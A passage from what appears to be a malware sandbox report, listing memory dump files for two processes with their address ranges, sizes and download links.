    1.2MB

    Download

  • memory/2004-91-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-90-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-89-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-88-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-87-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-86-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-80-0x00000000005B0000-0x00000000005C6000-memory.dmp

    Filesize

    88KB

    Download

  • memory/2004-73-0x0000000000000000-mapping.dmp

    Download

  • memory/2004-84-0x0000000006D90000-0x00000000070AA000-memory.dmp

    Filesize

    3.1MB

    Download

  • memory/2016-81-0x0000000000400000-0x0000000000550000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2016-54-0x0000000075A71000-0x0000000075A73000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2016-61-0x0000000000400000-0x0000000000550000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2016-55-0x0000000000400000-0x0000000000550000-memory.dmp

    Filesize

    1.3MB

    Download